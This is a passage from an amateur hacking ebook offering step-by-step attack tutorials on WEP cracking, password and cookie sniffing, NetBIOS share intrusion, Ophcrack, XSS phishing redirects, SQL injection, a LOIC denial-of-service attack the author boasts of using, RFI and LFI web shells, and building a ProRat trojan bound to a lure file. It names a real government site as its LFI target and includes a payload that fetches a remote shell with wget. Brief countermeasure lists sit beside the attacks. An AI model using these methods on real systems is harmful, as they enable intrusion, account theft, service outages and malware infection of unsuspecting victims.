Like I said, hit Ctrl+C to stop this listing. (I had to do this once or twice to find the network I was looking for.) Once you've got it, highlight the BSSID and copy it to your clipboard for reuse in the upcoming commands. Now we're going to watch what's going on with that network you chose and capture that information to a file. Run: airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface) Where (channel) is your network's channel, and (bssid) is the BSSID you just copied to clipboard. You can use the Shift+Insert key combination to paste it into the command. Enter anything descriptive for (file name). I chose "yoyo," which is the network's name I'm cracking.

You'll get output like what's in the window in the background pictured below. Leave that one be. Open a new Konsole window in the foreground, and enter this command: aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface) Here the ESSID is the access point's SSID name, which in my case is yoyo. What you want to get after this command is the reassuring "Association successful" message with that smiley face. You're almost there. Now it's time for: aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface) Here we're creating router traffic to capture more throughput faster to speed up our crack. After a few minutes, that front window will start going crazy with read/write packets. (Also, I was unable to surf the web with the yoyo network on a separate computer while this was going on.) Here's the part where you might have to grab yourself a cup of coffee or take a walk. Basically you want to wait until enough data has been collected to run your crack. Watch the number in the "#Data" column—you want it to go above 10,000. (Pictured below it's only at 854.) Depending on the power of your network (mine is inexplicably low at -32 in that screenshot, even though the yoyo AP was in the same room as my adapter), this process could take some time. Wait until that #Data goes over 10k, though—because the crack won't work if it doesn't. In fact, you may need more than 10k, though that seems to be a working threshold for many.

Once you've collected enough data, it's the moment of truth. Launch a third Konsole window and run the following to crack that data you've collected: aircrack-ng -b (bssid) (file name-01.cap) Here the filename should be whatever you entered above for (file name). You can browse to your Home directory to see it; it's the one with .cap as the extension. If you didn't get enough data, aircrack will fail and tell you to try again with more. If it succeeds, it will look like this:

The WEP key appears next to "KEY FOUND." Drop the colons and enter it to log onto the network etc. Enjoy...

Packet Sniffing Packet sniffing is the act of capturing packets while going through a network. A packet sniffer, sometimes referred to as a network monitor or network analyzer, can be used legitimately by a network or system administrator to monitor and troubleshoot network traffic. Using the information captured by the packet sniffer an administrator can identify erroneous packets and use the data to pinpoint bottlenecks and help maintain efficient network data transmission With a packet sniffer, once the hacker gains access to wireless network he/she could intercept private information going through the network such as: usernames, passwords, IM conversations and e-mails. For ex- Wireshark and Network Miner . Basically Wireshark is a Packet sniffing tool in which it captures packets while going through a network. Below is a screenshot of it in working process.

Procedure Now lets crack FTP passwords1. First of all download Wireshark from here and install it on your computer plus make sure to install Winpcap which comes with Wireshark installation package also. 2. Now go to capture button at the top and start monitoring. 3. Now type “FTP” at the filter and it will filter out all ftp connections. 4. As you scroll down you will find the “FTP username” and “Password” for victims ftp account and you will be done.

Other Benefits of this tool1. This method or tool can also be used as to know your victims Facebook Cookies usually datr and inject them via Cookie injector (Add-on) in Mozilla Firefox etc. This hack is known as FB cookie Authentication hack. 2. By this, we can also hack one of the best email accounts provider known as Gmail with GX cookies. Please note- When you are on Lan based network, dont use Wireshark ever because it works only in the wireless networks. Use other tools such as Cain And Abel, EtterCap etc.

Countermeasures 1) Change Default Administrator Passwords and Usernames. 2) Change the Default SSID (recommended). 3) Turn on (Compatible) WPA / WEP Encryption. 4) Disable SSID Broadcast. 5) Assign Static IP Addresses to all Devices.

6) Enable MAC Address Filtering. 7) Turn Off the Network During Extended Periods of Non-Use (optional). 8) Always use SSL (Secure Socket Layer) encryption. 9) Make a long secure password for your router. I hope you all will enjoy it !

Chapter Seven- Windows Hacking

NetBIOS NetBIOS stands for Network Basic Input Output System. It is the art of hacking into someone else’s computer through your computer. It is a way for a LAN or WAN to share folders, files, drives, and printers. Below I am giving you a demonstration that how to hack other computers data via NetBIOS on LAN or WAN. Procedure 1. To perform this attack, we have to gain access to port no. 139 and all will be done easily!

2. Suppose you are sitting on a LAN and wanted to hack admins computer through your once. 3. First of all open any port or IP scanner like Cain and Abel or Angry IP Scanner etc. 4. Suppose you have open Cain and Abel and then click sniff with start button to search all IP networks. 5. Now hit the above + blue button and select “ All host in my subnet “ respectively. 6. Once you scanned, Remember the IP address of the computer you are going to break. 7. Open up cmd and check whether your victims is online or not by typing “ping (IP address of the target)”. For ex- lets say ping (192.168.1.110) 8. if your victims is online, then again type this command “nbtstat –a (IP address of target)” in cmd to know which drive is shared. For ex- nbtstat –a (192.168.1.110) 9. Now its time to see the data and access by typing “net view \\(IP Address of Target)”. For ex- net view \\(192.168.1.110) 10. Hence, to access his/her drive from your computer by making a disk on yours, simply type “net use G: \\(IP Address of Target)\(Shared Drive)” and enjoy hacking. For ex- net use G: \\(192.168.1.110)\(C)

Thats it !

Cracking Windows Passwords Now a days cracking Windows admin’s password is just like playing the games of children because many software's and sites comes into action to do this. Therefore today I going to teach you how to crack windows passwords using Ophcrack by just installing software or by running a live bootable cd also. So first let me clear you that Ophcrack is a free Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a Graphical User Interface and runs on multiple platforms. Note- This process mainly works on Windows Vista or XP only. FeaturesRuns on Windows, Linux/Unix, Mac OS X and much more. •Cracks LM and NTLM hashes also. •Free tables available for Windows XP and Vista. •Brute-force module for simple passwords. •Audit mode & CSV export. •Real-time graphs to analyze the passwords. •LiveCD available to simplify the cracking. •Loads hashes from encrypted SAM recovered from a Windows partition, Vista included. •Free and open source software (GPL) etc..

Steps needed to do-

Step 1: Go to ophcrack.sourceforge.net select Windows Vista or XP and download the ISO file. After the download is complete burn the ISO to a CD or DVD.

Step 2: Restart your computer (with the CD in) and your computer should now boot from the live CD into a Linux environment. Step 3: Ophcrack will automatically run as soon as the CD boots and now all you need to do is wait until Ophcrack has completely finished cracking the computer password(s). This process will take anywhere from 10 minutes to several hours depending on the strength of the password used to protect the computer. Step 4 : Look at the below screenshot to understand it carefully-

Step 5: Finally now that you know the computer password; reboot the computer, eject the CD and enter in the password.

That's it! Now you'll have complete access to everything on the admin’s computer by knowing his/her password and you can go ahead and remove parental controls or do whatever you'd like.

Countermeasures 1. To prevent yourself from NetBIOS, simply disable the file and printer sharing option in the properties from which you have been connected to the internet. 2. To prevent yourself from ophcrack, always make your windows password long consisting of alphabets, numbers and ASCII Codes with jumbled format. For exKoW07oon$$

Chapter Eight- Web Hacking Gone are the days when website hacking was a sophisticated art. Today any body can access through the Internet and start hacking your website. All that is needed is doing a search on Google with keywords like “how to hack website”, “hack into a website”, “Hacking a website” etc. The following article is not an effort to teach you website hacking, but it has more to do with raising awareness on some common website hacking methods.

How to find a Vulnerable Website and Start Hacking? Now a days Website Hacking has become a tradition or fun to create problems for other people. Hackers are searching for finding the holes in the websites having high page ranks and traffic. Who knows what the hackers are going to do or their next target is on your site? Few years back there is not so much terror of being website hacked because at that time there is not so much of powerful tools developed by humans, but now the time is that even a newbie can find a vulnerable website and start hacking. Audit your website security with Acunetix Web Security Scanner Website security is possibly today's most overlooked aspect of securing the enterprise and should be a priority in any organization. Hackers are concentrating their efforts on web-based applications - shopping carts, forms, login pages, dynamic content, etc. Web applications are accessible 24 hours a day, 7 days a week and control valuable data since they often have direct access to backend data such as customer databases. Firewalls, SSL and locked-down servers are futile against web application hacking Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications are often tailor-made therefore tested less than off-the-shelf software and are more likely to have undiscovered vulnerabilities. Acunetix WVS automatically checks your web applications for SQL Injection, XSS & other web vulnerabilities. Commonly used Tool to find a vulnerable website Acunetix-

Acunetix is the world’s best tool developed to find a venerability in any web application as It automatically checks your web applications for SQL Injection, XSS & other web vulnerabilities. Acunetix Web Vulnerability Scanner includes many innovative features: • An automatic client script analyzer allowing for security testing of Ajax and Web 2.0 applications • Industries' most advanced and in-depth SQL injection and Cross site scripting testing • Advanced penetration testing tools, such as the HTTP Editor and the HTTP Fuzzer • Visual macro recorder makes testing web forms and password protected areas easy • Support for pages with CAPTHCA, single sign-on and Two Factor authentication mechanisms • Extensive reporting facilities including VISA PCI compliance reports • Multi-threaded and lightning fast scanner crawls hundreds of thousands of pages with ease • Intelligent crawler detects web server type and application language • Acunetix crawls and analyzes websites including flash content, SOAP and AJAX • Port scans a web server and runs security checks against network services running on the server.

Download Acunetix Web Security Scanner

Cross Site Scripting Cross-site scripting or XSS is a threat to a website's security. It is the most common and popular hacking a website to gain access information from a user on a website. There are hackers with malicious objectives that utilize this to attack certain websites on the Internet. But mostly good hackers do this to find security holes for websites and help them find solutions. Cross-site scripting is a security loophole on a website that is hard to detect and stop, making the site vulnerable to attacks from malicious hackers. This security threat leaves the site and its users open to identity theft, financial theft and data theft. Cross site scripting (XSS) occurs when a user inputs malicious data into a website, which causes the application to do something it wasn’t intended to do. XSS attacks are very popular and some of the biggest websites have been affected by them including the FBI, CNN, Ebay, Apple, Microsoft, and AOL. Some website features commonly vulnerable to XSS attacks are: • Search Engines • Login Forms • Comment Fields

There are three types of XSS attacks: 1. Local– Local XSS attacks are by far the rarest and the hardest to pull off. This attack requires an exploit for a browser vulnerability. With this type of attack, the hacker can install worms, spambots, and backdoors onto your computer. 2. Non-Persistent – Non-persistent attacks are the most common types of attack and don’t harm the actual website. Non-persistent attacks occur when (- a scripting language that is used for client-side web development.) or HTML is inserted into a

variable which causes the output that the user sees to be changed. Non-persistent attacks are only activated when the user visits the URL crafted by the attacker. 3. Persistent – Persistent attacks are usually used against web applications like guest books, forums, and shout boxes. Some of the things a hacker can do with a persistent attacks are: • Steal website cookies (Cookies are used by web browsers to store your user information so that you can stay logged into a website even after you leave. By stealing your cookie, the attacker can sometimes login without knowing your password). • Deface the website • Spread Worms Now that you know what cross site scripting is, how can you tell if a website if vulnerable to it ? 1. If there is a search field, enter a word and if that word is displayed back to you on the next page, there’s a chance it is vulnerable. 2. Now we will insert some HTML. Search for <h1>hi</h1>, and if the word “hi” is outputted as a big header, it is vulnerable. 3. Now we will insert JavaScript. Search for <script>alert(“hi”);</script> , if the word “hi” pops up in a popup box, then the site is vulnerable to XSS.

4. As you can see, these examples are non-persistent. Now if a hacker found a guest book or something else like it that was vulnerable, he would be able to make it persistent and everyone that visits the page would get the above alert if that was part of his comment. Hackers knowledgeable in JavaScript and PHP will be able to craft advanced XSS attacks to steal your cookies and spread XSS worms, but to show you a simple example of something more realistic then the above examples, I will show you how a hacker could use XSS to help with phishing. 1. Let’s say a hacker wants to phish passwords from www.victim-site.com. If he was able to find an XSS vulnerability anywhere on the website, he would be able to craft a link pointing to the legit website that redirects to his phishing website. 2. In the example with the popup, when I inserted the JavaScript into the search box, a URL was formed that looked like the following: Here you can see that the code you typed into the search box was passed to the “searchbox” variable. 3. In the URL the hacker would then replace everything in between ?searchbox= and

&search with the following JavaScript code: <script>window.location = “http://phishing-site.com�</script> 4. Now when you go to the finished link, the legitimate site will redirect to the phishing website. Next what the hacker would do is encode the URL to make it look more legit and less suspicious. You can encode the URL at http://www.encodeurl.com/. 5. My finished encoded URL is: http%3A%2F%2Flocalhost%2Fform.php%3Fsearchbox %3D%3Cscript%3Ewindow.location+%3D+%5C%22http%3A%2F%2Fphishing-site.com %5C%22%3C%2Fscript%3E%26search%3Dsearch%21 6. Once the victim sees that the link points to the legitimate website, he will be more likely to fall for the phishing attack. Done !

Performing SQL Attacks

A SQL injection is often used to attack the security of a website by inputting SQL statements in a web form to get a badly designed website to perform operations on the database (often to dump the database content to the attacker) other than the usual operations as intended by the designer. SQL injection is a code injection technique that exploits a security vulnerability in a website's software. Therefore, below I am using an popular tool known as Havij to explain you this type of attack. Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page. It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the

underlying file system and executing commands on the operating system. The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than of 95% at injecting vulnerable targets using Havij. The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users. Features1. Supported Databases with injection methods:MsSQL 2000/2005 with error MsSQL 2000/2005 no error union based MsSQL Blind MySQL time based MySQL union based MySQL Blind MySQL error based MySQL time based Oracle union based Oracle error based PostgreSQL union based MsAccess union based MsAccess Blind Sybase (ASE) and Blind . 2. HTTPS Support 3. Proxy support 4. Automatic database detection 5. Automatic type detection (string or integer) 6. Automatic keyword detection (finding difference between the positive and negative response)

7. Trying different injection syntax’s 8. Options for replacing space by /**/,+,... against IDS or filters 9. Avoid using strings (magic_quotes similar filters bypass) 10. Manual injection syntax support 11. Manual queries with result 12. Bypassing illegal union 13. Full customizable http headers (like referrer,user agent and ...) 14. Load cookie from site for authentication 15. Http Basic and Digest authentication 16. Injecting URL rewrite pages 17. Bypassing mod_security web application firewall and similar firewalls 18. Real time result 19. Guessing tables and columns in mysql<5 (also in blind) and MsAccess 20. Fast getting tables and columns for mysql 21. Executing SQL query in Oracle database 22. Getting one row in one request (all in one request) 23. Dumping data into file 24. Saving data as XML format 25. View every injection request sent by program 26. Enabling xp_cmdshell and remote desktop 27. Multi thread Admin page finder and Online MD5 cracker 28. Getting DBMS Information’s 29. Getting tables, columns and data 30. Command execution (mssql only) 31. Reading system files (mysql only) 32. insert/update/delete data .

Below is a screenshot of Havij -

How to use it? This tool is for exploiting SQL Injection bugs in web application. For using this tool you should know a little about SQL Injections. Enter target url and select http method then click Analyze. Note: Try to url be valid- input that returns a normal page not a 404 or error page etc. Download

Denial of Service Attack Are you curious about how to flood a website with dos attack as most of the hackers do for fun, if yes then sit down and check this article below. I am going to explain 1 by 1 proper definitions of it and also tell how to perform this attack in the end. What is a Denial Of Service Attack?

A denial of service attack (DOS) is an attack through which a person can render a system unusable or significantly slow down the system for legitimate users by overloading the resources, so that no one can access it. If an attacker is unable to gain access to a machine, the attacker most probably will just crash the machine to accomplish a denial of service attack,this one of the most used method for website hacking. There are several general categories of DoS attacks. Popularly, the attacks are divided into three classes: 1. bandwidth attacks, 2. protocol attacks 3. logic attacks

What is Distributed Denial of Service Attack? In DDOS attack, The attacker launches the attack using several machines. In this case, an attacker breaks into several machines, or coordinates with several zombies to launch an attack against a target or network at the same time. This makes it difficult to detect because attacks originate from several IP addresses. If a single IP address is attacking a company, it can block that address at its firewall. If it is 30000 this is extremely difficult.

Damages made By Denial of service attack: Over past years Denial of service attack has made huge amount of damage,Many of the have been victimed of this attack. Its Real,On February 6th, 2000, Yahoo portal was shut down for 3 hours. Then retailer Buy.com Inc. (BUYX) was hit the next day, hours after going public. By that evening, eBay (EBAY), Amazon.com (AMZN), and CNN (TWX) had gone dark. And in the morning, the mayhem continued with online broker E*Trade (EGRP) and others having traffic to their sites virtually choked off. This attack also recently hit twitter on 6th August 2009,lot of people had trouble on

logging on twitter,It was brought down by denial of service attack,They tired up there server so no one can get on log on it. Websites like Facebook,eBay etc. have also been victim of this attack. Now i will show you how you can flood a website with Denial of service attack. For this tutorial we will be using one of the most effective and one of the least known tools called "Low Orbit Ion Cannon", created by Anonymous members from 4chan.org, this program is one of the best for DDoS'ing, and I have successfully used it to DDoS websites. An internet connection as bad as mine (2,500 kb/s) was able to keep a site down for a day with this program running. Remember that this tool will work best with high internet speeds, and try not to go for impossible targets (like Google, MySpace,Yahoo). LOIC is used on a single computer, but with friends it's enough to give sites a great deal of downtime. Prerequisites: Download LOIC (Low Orbit Ion Cannon) from here, then Open up LOIC. Step 1: Type the target URL in the URL box. Step 2: Click lock on. Step 3: Change the threads to 9001 for maximum efficiency. Step 4: Click the big button "IMMA FIRIN MAH LAZAR!" Done!

Remote File Inclusion RFI is one of the popular Web hacking method used by the Hackers in todays world. Remote File Inclusion occurs when a remote file, usually a shell (a graphical interface for browsing remote files and running your own code on a server), is included into a website which allows the hacker to execute server side commands as the current logged on user, and have access to files on the server. With this power the hacker can continue on to use local exploits to escalate his privileges and take over the whole system. Many servers are vulnerable to this kind of attack because of PHP’s default settings of register_globals and allow_url_fopen being enabled. Although as of PHP 6.0, register_globals has been depreciated and removed, many websites still rely on older

versions of PHP to run their web applications. Now let’s go through the steps a hacker would take to exploit this type of vulnerability in a website. 1. First the hacker would find a website that gets its pages via the PHP include() function and is vulnerable to RFI. Many hackers use Google dorks to locate servers vulnerable to RFI. A Google dork is the act of using Google’s provided search tools to help get a specific search result. 2. Website that include pages have a navigation system similar to: http://target-site.com/index.php?page=PageName 3. To see if a the page is vulnerable, the hacker would try to include a site instead of PageName like the following: http://target-site.com/index.php?page=http://google.com 4. If the Google homepage shows up on the website, then the hacker knows the website is vulnerable and would continue to include a shell. 5. A couple of the most popular shells are c99 and r57. A hacker would either upload them to a remote server or just use a Google dork to locate them already online and insert them. To find the a shell the hacker would search Google for: inurl:c99.txt. This will display many websites with the shell already up and ready to be included. At the end of the URL make sure to add a ? so that if anything comes after c99.txt, it will be passed to the shell and not cause any problems. The new URL with the shell included would look like: http://target-site.com/index.php?page=http://site.com/c99.txt? 6. Sometimes the PHP script on the server appends “.php” to the end of every included file. So if you included the shell, it would end up looking like “c99.txt.php” and not work. To get around this, you would add a null byte (%00) to the end of c99.txt. This tells the server to ignore everything after c99.txt. 7. In step one, I told you that hackers use Google dorks to look for sites possibly vulnerable to RFIs. An example of a Google dork would be: allinurl:.php?page=. This looks for URL’s with .php?page= in them. This is only an example and you most likely won’t find any vulnerable sites with that search. You can try switching around the word “page” with other letters and similar words. Hackers usually search vulnerability databases like www.milw0rm.com for already discovered RFI vulnerabilities in site content management systems and search for websites that are running that vulnerable web application with a Google dork. 8. If the hacker succeeds in getting the server to parse the shell, he will be presented with a screen similar to the following:

The shell will display information about the remote server and list all the files and directories on it. From here the hacker would find a directory that has read and write privileges and upload the shell but this time as a .php file so that incase the vulnerability is fixed, he will be able to access it later on. 9. The hacker would next find a way to gain root privileges on the system. He can do this by uploading and running local exploits against the server. He could also search the victim server for configuration files. These files may contain username and passwords for the MYSQL databases and such. To protect yourself from RFI attacks, simply make sure you are using up-to-date scripts, and make sure you server php.ini file has register_globals and allow_url_fopen disabled. Enjoy Hacking :D

Cookie Poisoning Well, for a starters i can begin with saying that Cookie Poisoning is a lot like SQL Injection.

Both have 'OR'1'='1 or maybe '1'='1' But in cookie poisoning you begin with alerting your cookies Javascript:alert(document.cookie) Then you will perharps see "username=JohnDoe" and "password=iloveJaneDoe" in this case the cookie poisoning could be: Javascript:void(document.cookie="username='OR'1'='1"); void(document.cookie="password='OR'1'='1"); It is also many versions of this kind... like for example ' '1'='1' 'OR'1'='1 'OR'1'='1'OR' and so on... For more details- Refer to my website www.krackoworld.com

DOTNetNuke Actually DotNetNuke is an open source web content management system based on Microsoft .NET technology which allows us to upload any thing to the web server of your victims domain etc. Please perform this attack in Google chrome, Mozilla Firefox or Opera only. Below is the procedure of performing it by simply using Google search engine. Procedure 1. Open www.google.com 2. then search this dork to find vulnerable sites using Google or you can also find it yourself by doing other methods also‌

:inurl:/tabid/36/language/en-US/Default.aspx 3. Now you will find many websites in the Google search as given below-

4. Choice one of the sites above and open it in the browser. 5. For ex- you choose- http://www.xyz.com/Home/tabid/36/Language/enUS/Default.aspx where xyz is domain name 6. Now replace- /Home/tabid/36/Language/en-US/Default.aspx with this /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx 7. and hit enter‌ 8. Hence, you will see this screen in the browser-

8. Choose the 3rd option above and then at the address bar, type this JavaScript belowjavascript:__doPostBack('ctlURL$cmdUpload','') 9. Done! Now you have the upload option coming at the site like this-

10. Now you can upload any type of file you want as for ex- txt, swf, jpg, gif, pdf Files etc.. 11. After uploading files, your file is save in root folder and your address will be such as http://www.xyz.com/portals/0/krackoworld.txt and have full access. 12. Chapter closed here‌ Tip - You can also use Google dork such as inurl:"/portals/0" to find more vulnerable sites above.

Local File Inclusion Local File Inclusion (also known as LFI) is the process of including files on a server through the web browser. This vulnerability occurs when a page include is not properly sanitized, and allows directory traversal characters to be injected. A typical example of a PHP script vulnerable to LFI is as follows:

<?php $file = $_GET['file']; if(isset($file)) { include("pages/$file"); } else { include("index.php"); } ?>

Requirements Few Things You Need to Start1) Site vulnerable to LFI ( http://www.bislig.gov.ph ) 2) Remote shell ( http://www.yourhosting/urshell.txt 3) User-Agent switcher ( https://addons.mozilla.org/en-US/firefox...-switcher/ 4) Mozilla Firefox Procedure First of all see if your site is vulnerable to LFI (I'm not going to explain how to find it or exploit it) Try to open etc/passwd Example: http://www.bislig.gov.ph/content1.php? page=5&directLinks=../../../../../../../../../../../../../../etc/passwd OK fine...We can open etc/passwd Now type proc/self/environ Example: http://www.bislig.gov.ph/content1.php? page=5&directLinks=../../../../../../../../../../../../../../proc/self/environ

Now download and install User-Agent switcher. Go to Tools > Default User-Agent > Edit User Agents You will get this window.

Now make new user-agent by Going to New > New User-Agent You will get something like this:

<?php phpinfo();?>

Now leave everything as it is except description and user-agent. In description enter name of it (Mine is phpinfo) In User-Agent paste this in there. Select your User-Agent in Tools > Default User Agent > PHP Info (Or whatever you User Agent is called) Go to your site and refresh it. You should get something like this in your site.

Now search for "disable_functions" (Ctrl+F Search function) Mine is disable_functions | no value | no value That is good.We can spawn our shell now! Now go back and edit your User-Agent. Change "User-Agent" to: <?exec('wget http://www.sh3ll.org/egy.txt -O shell.php');?> (What this function do?. It downloads shell in .txt format and renames it as shell.php) Save it and refresh your site. Go to http://www.LFISITE.com/shell.php (Mine is http://www.bislig.gov.ph/shell.php ) Voila,we have our shell up. Done !

Session Hijacking This is not much related to web hacking but plays an important role in accounts(usernames and passwords) hacking by cookie stealing techniques. Session hijacking is the exploitation of a valid computer session—sometimes also called a session key—to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to are mote server. It has particular relevance to web developers, as the HTTP cookies used to maintain a session on many web sites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim's computer (see HTTP cookie theft). TCP session hijacking is when a hacker takes over a TCP session between two machines. Since most authentication only occurs at the start of a TCP session, this allows the hacker to gain access to a machine. A popular method is using source-routed IP packets. This allows a hacker at point A on the network to participate in a conversation between B and C by encouraging the IP packets to pass through its machine. If source-routing is turned off, the hacker can use "blind" hijacking, whereby it guesses the responses of the two machines. Thus, the hacker can send a command, but can never see the response. However, a common command would be to set a password allowing access from somewhere else on the net. A hacker can also be "inline" between B and C using a sniffing program to watch the conversation. This is known as a "man-in-the-middle attack". A common component of such an attack is to execute a denial-of-service (DoS) attack against one end-point to stop it from responding. This attack can be either against the machine to force it to crash, or against the network connection to force heavy packet loss. Methods There are four main methods used to perpetrate a session hijack. These are:

•Session fixation, where the attacker sets a user's session id to one known to him, for example by sending the user an email with a link that contains a particular session id. The attacker now only has to wait until the user logs in. •Session side jacking, where the attacker uses packet sniffing to read network traffic between two parties to steal the session cookie. Many web sites use SSL encryption for login pages to prevent attackers from seeing the password, but do not use encryption for the rest of the site once authenticated. This allows attackers that can read the network traffic to intercept all the data that is submitted to the server or web pages viewed by the client. Since this data includes the session cookie, it allows him to impersonate the victim, even if the password itself is not compromised. Unsecured Wi-Fi hotspots are particularly vulnerable, as anyone sharing the network will generally be able to read most of the web traffic between other nodes and the access point. •Alternatively, an attacker with physical access can simply attempt to steal the session key by, for example, obtaining the file or memory contents of the appropriate part of either the user's computer or the server. •Cross-site scripting, where the attacker tricks the user's computer into running code which is treated as trustworthy because it appears to belong to the server, allowing the attacker to obtain a copy of the cookie or perform other operations.

Prevention Methods to prevent session hijacking include: •An open source solution is ArpON "ARP handler inspection". It is a portable handler daemon that make ARP secure in order to avoid the Man In The Middle (MITM) through ARP Spoofing/Poisoning attacks. It detects and blocks also derived attacks by it for more complex attacks, as: DHCP Spoofing, DNS Spoofing, WEB Spoofing,Session Hijacking and SSL/TLS Hijacking & co attacks. •Use of a long random number or string as the session key. This reduces the risk that an attacker could simply guess a valid session key through trial and error or brute force attacks. •Regenerating the session id after a successful login. This prevents session fixation because the attacker does not know the session id of the user after he has logged in. •Encryption of the data passed between the parties; in particular the session key. This technique is widely relied-upon by web-based banks and other e-commerce

services, because it completely prevents sniffing-style attacks. However, it could still be possible to perform some other kind of session hijack. •Some services make secondary checks against the identity of the user. For example, a web server could check with each request made that the IP address of the user matched the one last used during that session. This does not prevent attacks by somebody who shares the same IP address, however, and could be frustrating for users whose IP address is liable to change during a browsing session. •Alternatively, some services will change the value of the cookie with each and every request. This dramatically reduces the window in which an attacker can operate and makes it easy to identify whether an attack has taken place, but can cause other technical problems (for example, preventing the back button from working properly, on the web). •Users may also wish to log out of websites whenever they are finished using them.

Firesheep Recently a firefox extension called Firesheep has exploited and made it easy for public wifi users to be attacked by session hijackers. Websites like Facebook, Twitter, and any that the user adds to their preferences allow the firesheep user to easily access private information from cookies and threaten the public wi-fi users personal property. Below is a video link given by Rahul Tyagi (An Ethical Hacker) to demonstrate Session hijacking properly. http://www.slideshare.net/amansyal/session-hijacking-by-rahul-tyagi

Countermeasures

A Few Defensive Measures against web hacking* If you utilize a web content management system, subscribe to the development blog. Update to new versions as soon as possible. * Update all 3rd party modules as a matter of course — any modules incorporating web forms or enabling member file uploads are a potential threat. Module vulnerabilities can offer access to your full database. * Harden your Web CMS or publishing platform. For example, if you use WordPress, use this guide as a reference. * If you have an admin login page for your custom built CMS, why not call it 'books.php' or something, instead of “AdminLogin.php” etc.? * Enter some confusing data into your login fields like the sample Injection strings shown above, and any else which you think might confuse the server. If you get an unusual error message disclosing server-generated code then this may betray vulnerability. * Do a few Google hacks on your name and your website. Just in case… * Thats it ! Good luck for your future in website building.

Chapter NineMalware Malware, short for malicious software, consists of programming (code, scripts, active content, and other software) designed to disrupt or deny operation, gather information that leads to loss of privacy or exploitation, gain unauthorized access to system resources, and other abusive behavior. Software is considered to be malware based on the perceived intent of the creator rather than any particular features. Malware includes computer viruses, worms,Trojan horses, spyware, dishonest adware, crimeware, most rootkits, and other malicious and unwanted software or program.

Types of Malware

1. Trojan Horse Trojan virus or Trojan horse is one of the most common types of malware, Trojan virus is mostly used to control the victims computer rather than infecting or destroying files on victims computer. A Trojan horse once installed into victims computer can give a hacker complete access to your computer. Trojans are one of the most dangerous forms of malware. 2. Computer Viruses A computer virus a malicious program which is mostly developed to infect a computer, once it infects a computer it replicates or reproduces itself. A virus is just like a parasite and it needs another host to attach to in order to infect a computer. 3. Worms Worms are almost similar to computer viruses the only difference unlike computer viruses they do not require another host to attach to in order to infect a computer. Once a worm infects a computer it replicates itself. Computer worms are major threats to large networks. 4. Keyloggers A Keylogger is a hardware or software device which monitors every keystroke, screen shots, chats etc. typed on the computer. A keylogger program does not require physical access to the user's computer. Any person with a basic knowledge of computer can use keylogger. 5. Adware Adware is the short form of Advertisement-supported software. Adware’s are commonly designed to display advertisements on your computers. However some of these adwares may contain harmful viruses and spying programs which can bring your computer system to knees.

6. RATS RAT is the short of “Remote Administration Tool” and is indeed one of the most dangerous types of malware. It’s very similar to a Trojan. Once a RAT is installed in a computer the attacker can do almost anything on the remote computer such as installing a keylogger, shutting down a computer, infecting files etc. 7. Bacteria Bacteria make many copies of themselves and eventually end up taking up all of the computers resources such as all of its processor power, memory and disk space. This results in the legitimate user losing access to those resources. 8. Threat Bombs Logic bombs are usually pieces of code that are programmed into a program that lie dormant until a certain time or until a user does a certain action which causes it to be executed.

ProRat ProRat is a Remote administration tool (RAT). ProRat opens a port on infected computer which allows the client to perform various operations on the infected computer. Once ProRat is installed on a computer it’s very difficult to remove it without an updated Antivirus program. Below I will show the procedure which a hacker will take to take control of victims computer using ProRat. 1. First of all download ProRat. The password of the zip file will be “Pro”. 2. Disable your Antivirus before using ProRat and Once you have downloaded it launch the program. You will see the following screen below:-

3. Click on the Create button at bottom to create the Trojan file and choose the Create ProRat server. 4. Put your IP address in the IP(DNS) Address box so the server could connect you. 5. Now open Notifications at the sidebar and select the second option “Mail Notifications”.Here you will an email address “bomberman@yahoo.com” change this to the email address where you want to receive notifications when the server is installed into your victims computer. 6. Now click on the General Setting option. Enter the server port you would like to connect through. Enter the server password, you will be asked for server password when the victim gets infected and you would like to connect to them and then choose the victim name. You can also tick the “Give a fake error” message option when the victim will open the server he will get a fake error message which you configure making victim think that the file is damaged or corrupted. 7. Click on Bind with file on the sidebar. You can bind it with a text document or any other file you may increase chances of victim to click it. 8. Now Click on Server extensions option. Here you can change the desired extension. I will use EXE because it has Icon support or you can also use SCR too it also has icon support too. 9. Now Click on server Icon and choose the desired icon you would like to display for the server and click on Create server. Now you have successfully created a server. The hacker could rename it something like “Funny joke” and sent it via email attachment or alternatively the hacker could upload it to webhosting site and just ask the victim to manually download it. Once the victims

runs the server on his/her computer he will get an error message which I configured in the general settings tab. The server gets installed silently in the computer background and the hacker will be sent a notification to the email address he described in the notification tab whenever the victim is infected.

Countermeasures There are a couple things you can do to prevent yourself from being infected by the malware discussed in this post. 1. Make sure you have good and up-to-date anti-virus software installed on your computer. Also if there is an automatic update option on your anti-virus software, make sure it is enabled. 2. Make sure you have a firewall installed on your computer and make sure that it is actually enabled. Firewalls protect against unauthorized inbound and outbound connections. Thanks!

Chapter Ten- Conclusion

Congratulations You have done it ! From now you will be considered as Ethical hacker and Computer Security Expert like me. So don’t thing this is enough, develop an habit of keep learning and learning because every new thing will teach you a new lesson in your life. According to me, Exploring is the true power of hacking.

Tell Others about my eBook ! Special request from me to my dear friends and colleagues to please tell others about it by direct contacting or on their website, Blog, Facebook and twitter links to buy. Note- Don't redistribute it, just ask them to purchase from my website.

My Blog/Website www.Krackoworld.com is my Hacking/Security Blog. It was launched in 2010 behind the

reason of awaking people about hacking and how to safeguard yourself from it. Please subscribe to my Blog RSS to get cool tuts and latest news about Hacking. Please NoteSome of the articles of my blog has been taken into this eBook.

Suggestions I would love to hear any type of suggestions from you people about my newly published eBook. All you have to tell me via email– krackoworld@gmail.com

